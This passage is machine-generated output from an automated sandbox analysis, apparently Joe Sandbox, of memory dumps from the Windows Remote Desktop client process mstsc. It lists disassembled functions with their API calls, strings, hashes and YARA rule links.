                                                                                                                                                                                    • GetDlgItem.USER32(?,009375DD), ref: 009371AE
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?,?,?,?,?,?,009375DD,?,0096A2E0,00000005,?,?,00906D74), ref: 009371C4
                                                                                                                                                                                    • SendMessageW.USER32(009375DD,00000031,00000000,00000000), ref: 009371D7
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 009371E3
                                                                                                                                                                                    • DrawTextW.USER32(00000000,?,000000FF,?,00000410), ref: 009371FA
                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0093720F
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0093721B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$Select$ClientCompatibleCreateDeleteDrawItemMessageRectSendText
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3306118528-0
                                                                                                                                                                                    • Opcode ID: 77df0c40512822ccd5ba95b7c89dcaec2ad8245eda2eda5f0be6bce4f42615e1
                                                                                                                                                                                    • Instruction ID: c29195f1aeb529aef9a8875fa7b6e5a898ab135596d627d4669b56c0ef4c1959
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77df0c40512822ccd5ba95b7c89dcaec2ad8245eda2eda5f0be6bce4f42615e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78415EB2A08209AFDB24DFE4DC84AAFBBB9AB49300F154559F911B3261C6709D50DF60
                                                                                                                                                                                    Function 00922AD9 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000141,000000FF,00000000), ref: 00922B0E
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000144,00000000,00000000), ref: 00922B22
                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 00922B40
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 00922B67
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00922BB9
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00922BC8
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000040E,00000000,00000001), ref: 00922BD3
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 00922BDD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$wcsncmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2995519212-0
                                                                                                                                                                                    • Opcode ID: 875ad86af47b68e63f037a2898ac56d79fc688405545534f84a7d07769526c07
                                                                                                                                                                                    • Instruction ID: 008062c823c0f327646fd2b55be7ec410dba2f148bdb3aa1547d3bc2a76c9187
                                                                                                                                                                                    • Opcode Fuzzy Hash: 875ad86af47b68e63f037a2898ac56d79fc688405545534f84a7d07769526c07
                                                                                                                                                                                    • Instruction Fuzzy Hash: 772107B1A443183AF725AF65AC85FBA776CEF4A754F100124FA10BA1D5C6B0CC418A69
                                                                                                                                                                                    Function 009393CA Relevance: 12.1, APIs: 8, Instructions: 98windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 009393F2
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001396), ref: 00939408
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00939413
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001397), ref: 00939436
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00939441
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0093946F
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041F,00000000), ref: 009394A2
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,?,00939ADF,?,?,00000004), ref: 009394CE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ItemRect$ClientLongMessageScreenSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 425840078-0
                                                                                                                                                                                    • Opcode ID: a2a0bc238d32d7492b25436f40868cda21959c7ea3cdd1001f9bcfdad001bbc7
                                                                                                                                                                                    • Instruction ID: 37475fbe2637359518aceb7f758dbab40711f8fca0118be4d2ffb50e2f381679
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2a0bc238d32d7492b25436f40868cda21959c7ea3cdd1001f9bcfdad001bbc7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 33315E71A1412AAFCB14DFA8DD49BFEFBB9FB04701F044219F955A61A0CBB0A911DF90
                                                                                                                                                                                    Function 009118C2 Relevance: 10.8, APIs: 7, Instructions: 289COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00911745: lstrcmpiW.KERNEL32(?,00912930,?,00000001,00911934,?,00000000,00000000,00000000,?,00000000,00912930,00000001,00912930,?,00912930), ref: 009117B5
                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 009119F8
                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 00911A13
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$lstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3586774192-0
                                                                                                                                                                                    • Opcode ID: 999be8b71ed0f35766fd0db58d665f77f3e42167a06010e39ef8a23d365c9d78
                                                                                                                                                                                    • Instruction ID: f145c9c7c69377656acae38442a600beb93116772f5bf5f2ddde6c92f38682bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 999be8b71ed0f35766fd0db58d665f77f3e42167a06010e39ef8a23d365c9d78
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7A19271B0412DAADB249B24CCC9AEDB7B9EF64300F4545AAEB09D7240E7709EC1CF91
                                                                                                                                                                                    Function 00952A0D Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 247memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000,?), ref: 00952B1A
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00952BFC
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?), ref: 00952C59
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00952D0B
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00952D18
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$AllocFreeMessageTrace$ActivityControlEventmemcpy
                                                                                                                                                                                    • String ID: RecordToString failed$ppwszSettingsStore
                                                                                                                                                                                    • API String ID: 3157406721-3595829931
                                                                                                                                                                                    • Opcode ID: 4655c7724a385696d6d181ce8d7ff6a5f188292d255eea2f782a6731eee4ad29
                                                                                                                                                                                    • Instruction ID: be85268c34c4df7ec7f39e0310f963743043bf9d3bdc25ca031667c9854d82a6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4655c7724a385696d6d181ce8d7ff6a5f188292d255eea2f782a6731eee4ad29
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD91B1716083419FC729CF1AD854B2A7BE9BB8A315F04489DFD849B2A2C775DC48EF42
                                                                                                                                                                                    Function 022E0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02302206
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                                                    • Opcode ID: 186e65ae703754714ed6adb88f136ba0293f949f578bf94831c5d2e26871bc9b
                                                                                                                                                                                    • Instruction ID: ebeee18cd4faae848ac1f85efce263eaec798453b46c58c4e1daddd5bcfbe11a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 186e65ae703754714ed6adb88f136ba0293f949f578bf94831c5d2e26871bc9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38514A317103116BEB24DA94CCD5F6773AAAB88720F214269FD05DB2C9DB71EC42CBA0
                                                                                                                                                                                    Function 0093BBD4 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 197COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Dialog
                                                                                                                                                                                    • String ID: OnClickOkButton failed!$OnClickOkButton failed!. Closing the dialog.$TscProxyLinkDelSavedCreds$TscProxyLinkEditSavedCreds
                                                                                                                                                                                    • API String ID: 1120787796-1241226549
                                                                                                                                                                                    • Opcode ID: a4fa0f7c26184d705d490628f48194d6e3960b98cbea25fae299e987aba666b7
                                                                                                                                                                                    • Instruction ID: 1c6b452f365b7649f556699abe3958cd267146f0829de1aceda3575ba5a89e7b
                                                                                                                                                                                    • Opcode Fuzzy Hash: a4fa0f7c26184d705d490628f48194d6e3960b98cbea25fae299e987aba666b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A5142B120420AABCB39AF28CC55B7A76AAFF84310F048519FB569B1E1DB35DC40DF90
                                                                                                                                                                                    Function 009129DD Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00912A70
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00912AEE
                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 00912B33
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Module$FileHandleNamememcpy_s
                                                                                                                                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                                    • API String ID: 3152089617-549000027
                                                                                                                                                                                    • Opcode ID: 93322df6726c9b6dd55222ecd3bdbe0b93dcb04c25e45a69e4857517aa776968
                                                                                                                                                                                    • Instruction ID: 6ec10aecd9c5750c54bec0f5e45aea2d41117c44fee61046c97fe69d1aea9167
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93322df6726c9b6dd55222ecd3bdbe0b93dcb04c25e45a69e4857517aa776968
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F518032B0462C9ADB20EF54DC84BEA73B8AF85710F1005A9F909E3551EB749EE4CF56
                                                                                                                                                                                    Function 00955853 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 137memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,Alternate Full Address,?), ref: 009558DC
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,009032EC,?,?,00000000,?,Alternate Full Address,?), ref: 009559A7
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • CRdpSettingsStore::CalculateSignScopeLength failed, xrefs: 009558A9
                                                                                                                                                                                    • szSignScope, xrefs: 00955900
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$ActivityAllocControlEventFreeMessageTrace
                                                                                                                                                                                    • String ID: CRdpSettingsStore::CalculateSignScopeLength failed$szSignScope
                                                                                                                                                                                    • API String ID: 2525042477-3863715102
                                                                                                                                                                                    • Opcode ID: adfeb83e2ebbcdcf48daa14f6fa254ecbd97e9672e9036dc937335faf492c58c
                                                                                                                                                                                    • Instruction ID: 251c1a0d7590e18d7dc2bb84a9961ceaa477cc5238a63b8167efba3078c2507c
                                                                                                                                                                                    • Opcode Fuzzy Hash: adfeb83e2ebbcdcf48daa14f6fa254ecbd97e9672e9036dc937335faf492c58c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9410235604704EFCB26DF5AC864B2ABBAAEB85325F464058FC04AB363C678CC44DF91
                                                                                                                                                                                    Function 0095626B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 122COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcstok_s.MSVCRT ref: 00956295
                                                                                                                                                                                    • wcstok_s.MSVCRT ref: 009562D7
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcstok_s$ActivityControlEvent
                                                                                                                                                                                    • String ID: Field in SignScope not found in store$RecordToString failed$SignScope$SignScope field not found in store
                                                                                                                                                                                    • API String ID: 684669608-1973409768
                                                                                                                                                                                    • Opcode ID: 48a712fc927cef893e9bb27a5b807358546d7e0013c25e4919d37f311c8762f5
                                                                                                                                                                                    • Instruction ID: c85b55d2f8c787e91195ebc699d9a95e65f3b531852324ebe2996de88e93f64d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 48a712fc927cef893e9bb27a5b807358546d7e0013c25e4919d37f311c8762f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE416831608304AFDB1ADF56C999F2A7BADAB8135AF440058FD42A71D2CA70DD0CDBA1
                                                                                                                                                                                    Function 00921182 Relevance: 10.6, APIs: 7, Instructions: 118windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009211A4
                                                                                                                                                                                    • memset.MSVCRT ref: 009211B8
                                                                                                                                                                                    • SendMessageW.USER32(?,0000104B,00000000,?), ref: 009211DB
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000,?,?,?), ref: 009211EF
                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000400,00000000), ref: 00921257
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?), ref: 00921299
                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000400,00000000), ref: 009212B0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$FreeLocallstrcmpimemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2915578346-0
                                                                                                                                                                                    • Opcode ID: ee6c3512fb40b6649c17d8dbe2c6181f49ddbfa135a45e8e8e92e8a2ae7a9144
                                                                                                                                                                                    • Instruction ID: 3fe1c255e585945d21f2f67c4014d3ebb263418d73a83392bf10cd984a740dfb
                                                                                                                                                                                    • Opcode Fuzzy Hash: ee6c3512fb40b6649c17d8dbe2c6181f49ddbfa135a45e8e8e92e8a2ae7a9144
                                                                                                                                                                                    • Instruction Fuzzy Hash: 57416D71A04328FFDB259F98EC48FAE7BB9BB58301F100055F610E61A5C7B5D9A0EB54
                                                                                                                                                                                    Function 0096314D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0096317C
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003308), ref: 0096318D
                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00963194
                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00003308,?,00000200,?,?,?), ref: 009631F5
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 009631FF
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$AddressEnabledErrorFreeHandleLastLibraryMessageModuleProcTextTraceWindowmemset
                                                                                                                                                                                    • String ID: GetDlgItemText failed!
                                                                                                                                                                                    • API String ID: 3178783252-949728555
                                                                                                                                                                                    • Opcode ID: 4e2b6a5db9a498d57cd4156e828ef327e0b8756c128383c06d6f832e4c83c1b7
                                                                                                                                                                                    • Instruction ID: 22999f28dd102308afc5bd039bf3502cab112fdaa9b7dd5b692030d4eae055f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e2b6a5db9a498d57cd4156e828ef327e0b8756c128383c06d6f832e4c83c1b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0831F271A04314AFCB20DF65CC58F667BA9BF49310F014099F954AB2A1DB71DE809B95
                                                                                                                                                                                    Function 009659F5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00965A19
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000208,0096A020), ref: 00965A82
                                                                                                                                                                                    • UnregisterClassW.USER32(?,00000000), ref: 00965A90
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00965A9A
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to get module specific class name, xrefs: 00965A5B
                                                                                                                                                                                    • PAL_SYS_WIN32_TIMER_WNDCLASS, xrefs: 00965A26
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$AddressClassErrorFreeLastLibraryMessageProcTraceUnregistermemset
                                                                                                                                                                                    • String ID: Failed to get module specific class name$PAL_SYS_WIN32_TIMER_WNDCLASS
                                                                                                                                                                                    • API String ID: 3271539793-2015629946
                                                                                                                                                                                    • Opcode ID: d07cffd6673780b1b4f775e15d7bf2d780f7ba8e425ce7d4c2348626f584bcc1
                                                                                                                                                                                    • Instruction ID: df34812a73776d3b4f8267cd32cf64dcb748aff68ef3b7135f29f3be3854b4f9
                                                                                                                                                                                    • Opcode Fuzzy Hash: d07cffd6673780b1b4f775e15d7bf2d780f7ba8e425ce7d4c2348626f584bcc1
                                                                                                                                                                                    • Instruction Fuzzy Hash: C3213B326083486FD725EFE09C99FAF3F9DAB45300F51059DF801AB192CA71CC40AB91
                                                                                                                                                                                    Function 00965B02 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00965B26
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000208,0096A020), ref: 00965B8F
                                                                                                                                                                                    • UnregisterClassW.USER32(?,00000000), ref: 00965B9D
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00965BA7
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • PAL_SYS_WIN32_THREAD_WNDCLASS, xrefs: 00965B33
                                                                                                                                                                                    • Failed to get module specific class name, xrefs: 00965B68
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$AddressClassErrorFreeLastLibraryMessageProcTraceUnregistermemset
                                                                                                                                                                                    • String ID: Failed to get module specific class name$PAL_SYS_WIN32_THREAD_WNDCLASS
                                                                                                                                                                                    • API String ID: 3271539793-2016134723
                                                                                                                                                                                    • Opcode ID: 203783a7d1822a54bdf47829d99171677aa684636919e9cc284169a4d51849b9
                                                                                                                                                                                    • Instruction ID: ff696d54e6d1c6198bf49f9b8559394bec76938f1f9662b2100ba108dd259aac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 203783a7d1822a54bdf47829d99171677aa684636919e9cc284169a4d51849b9
                                                                                                                                                                                    • Instruction Fuzzy Hash: FE210B72A083486FD725DF749C49FAA3799EB45310F15059DF901AB1D2CAB1DC809F91
                                                                                                                                                                                    Function 0093699E Relevance: 10.6, APIs: 7, Instructions: 73COMMON
